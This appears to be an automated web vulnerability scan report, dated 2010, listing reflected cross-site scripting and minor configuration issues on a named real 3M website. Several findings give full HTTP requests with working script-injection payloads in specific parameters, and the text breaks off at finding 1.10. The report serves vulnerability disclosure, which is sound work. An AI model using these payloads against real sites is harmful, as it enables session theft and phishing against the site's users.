Report generated by Hoyt LLC Research at Tue Nov 16 09:13:50 CST 2010.


Loading

Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

1.1. http://solutions.3m.com/wps/portal/3M/en_US/Products/ProdServ/ [name of an arbitrarily supplied request parameter]

1.2. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [LC parameter]

1.3. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [btnG parameter]

1.4. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [btnG.x parameter]

1.5. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [btnG.y parameter]

1.6. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [co parameter]

1.7. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [gsaAction parameter]

1.8. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [name of an arbitrarily supplied request parameter]

1.9. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [pa parameter]

1.10. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [pl parameter]

1.11. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [q parameter]

1.12. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [type parameter]

1.13. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [url parameter]

2. Cross-domain Referer leakage

2.1. http://solutions.3m.com/en_US/

2.2. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/

3. Robots.txt file

4. HTML does not specify charset

4.1. http://solutions.3m.com/en_US/images/blobservlet10d5html.html

4.2. http://solutions.3m.com/en_US/images/blobservlet1e8fhtml.html

4.3. http://solutions.3m.com/en_US/images/blobservlet68dahtml.html

5. Content type incorrectly stated

5.1. http://solutions.3m.com/3MContentRetrievalAPI/BlobServlet

5.2. http://solutions.3m.com/en_US/images/blobservlet10d5html.html

5.3. http://solutions.3m.com/en_US/images/blobservlet1e8fhtml.html

5.4. http://solutions.3m.com/en_US/images/blobservlet68dahtml.html

5.5. http://solutions.3m.com/en_US/images/browser.css

5.6. http://solutions.3m.com/en_US/images/countrystyles.css

5.7. http://solutions.3m.com/favicon.ico

5.8. http://solutions.3m.com/wps/themes/html/3M.com/ie_domload.js



1. Cross-site scripting (reflected)  next
There are 13 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://solutions.3m.com/wps/portal/3M/en_US/Products/ProdServ/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Products/ProdServ/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdaf6"><script>alert(1)</script>2b549382efa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Products/ProdServ/?bdaf6"><script>alert(1)</script>2b549382efa=1 HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/wps/portal/3M/en_US/Products/ProdServ/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916826803:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:15:59 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:15:59 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite11
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
<a href="http://solutions.3m.com/wps/portal/3M/es_US/Products/ProdServ/?bdaf6"><script>alert(1)</script>2b549382efa=1">
...[SNIP]...

1.2. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [LC parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the LC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 698bf"><script>alert(1)</script>8fab3450582 was submitted in the LC parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US698bf"><script>alert(1)</script>8fab3450582&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:51 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:47 GMT
Vary: User-Agent,Cookie,Accept-Encoding
Served-By: Pyrite10
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
<a href="http://solutions.3m.com/wps/portal/3M/es_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US698bf"><script>alert(1)</script>8fab3450582&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

1.3. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [btnG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the btnG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff24c"><script>alert(1)</script>0075e0b15dc was submitted in the btnG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Searchff24c"><script>alert(1)</script>0075e0b15dc HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:17:22 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:17:22 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite11
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
58DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Searchff24c"><script>alert(1)</script>0075e0b15dc">
...[SNIP]...

1.4. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [btnG.x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the btnG.x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64bc9"><script>alert(1)</script>0f7191b210d was submitted in the btnG.x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=064bc9"><script>alert(1)</script>0f7191b210d&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:17:24 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:17:20 GMT
Vary: User-Agent,Cookie,Accept-Encoding
Served-By: Pyrite10
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=064bc9"><script>alert(1)</script>0f7191b210d&btnG.y=0&btnG=Search">
...[SNIP]...

1.5. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [btnG.y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the btnG.y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb23"><script>alert(1)</script>eb3c61fbd94 was submitted in the btnG.y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0cdb23"><script>alert(1)</script>eb3c61fbd94&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:17:21 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:17:21 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite9
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
8B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0cdb23"><script>alert(1)</script>eb3c61fbd94&btnG=Search">
...[SNIP]...

1.6. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [co parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12d5d"><script>alert(1)</script>a0d8b72c420 was submitted in the co parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc12d5d"><script>alert(1)</script>a0d8b72c420&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:51 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:51 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite9
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34689

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
<a href="http://solutions.3m.com/wps/portal/3M/es_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc12d5d"><script>alert(1)</script>a0d8b72c420&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

1.7. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [gsaAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the gsaAction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72fd0"><script>alert(1)</script>2b9682f74fa was submitted in the gsaAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR72fd0"><script>alert(1)</script>2b9682f74fa&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:48 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:49 GMT
Vary: User-Agent,Cookie
Content-Length: 13195
Served-By: Pyrite12
Content-Type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
<a href="http://solutions.3m.com/wps/portal/3M/es_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR72fd0"><script>alert(1)</script>2b9682f74fa&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

1.8. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ccc3"><script>alert(1)</script>4b6ab0dfedb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search&8ccc3"><script>alert(1)</script>4b6ab0dfedb=1 HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:17:23 GMT
Server: IBM_HTTP_Server
Cache-Control: public
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:17:23 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite11
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
8DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search&8ccc3"><script>alert(1)</script>4b6ab0dfedb=1">
...[SNIP]...

1.9. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [pa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b28"><script>alert(1)</script>25c30bb4b5a was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/3M/en_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A46b28"><script>alert(1)</script>25c30bb4b5a&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search HTTP/1.1
Host: solutions.3m.com
Proxy-Connection: keep-alive
Referer: http://solutions.3m.com/en_US/?WT.mc_id=www.3m.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: localePreference=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2FCountry%2F%3FWT.mc_id%3Dggp_redirect_en_US; ForeseeSurveyShown_jzaz6aHrDO=true; ForeseeLoyalty_MID_jzaz6aHrDO=6; WT_FPC=id=174.122.23.218-1935455696.30115224:lv=1289916872468:ss=1289916790837

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 14:16:50 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=90000
Expires: Wed, 17 Nov 2010 15:16:50 GMT
Vary: User-Agent,Cookie
Served-By: Pyrite11
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html>
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name
...[SNIP]...
<a href="http://solutions.3m.com/wps/portal/3M/es_US/Search/3M/?pl=7BC6E48B18005D658058DA7E7EA9508A&LC=en_US&type=cc&gsaAction=scBR&pa=7BC6E48B18005D658058DA7E7EA9507A46b28"><script>alert(1)</script>25c30bb4b5a&co=cc&url=http%3A%2F%2Fsolutions.3m.com%2Fwps%2Fportal%2F3M%2Fen_US%2FWW2%2F&q=%60%7C%7C&btnG.x=0&btnG.y=0&btnG=Search">
...[SNIP]...

1.10. http://solutions.3m.com/wps/portal/3M/en_US/Search/3M/ [pl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://solutions.3m.com
Path:   /wps/portal/3M/en_US/Search/3M/

Issue detail

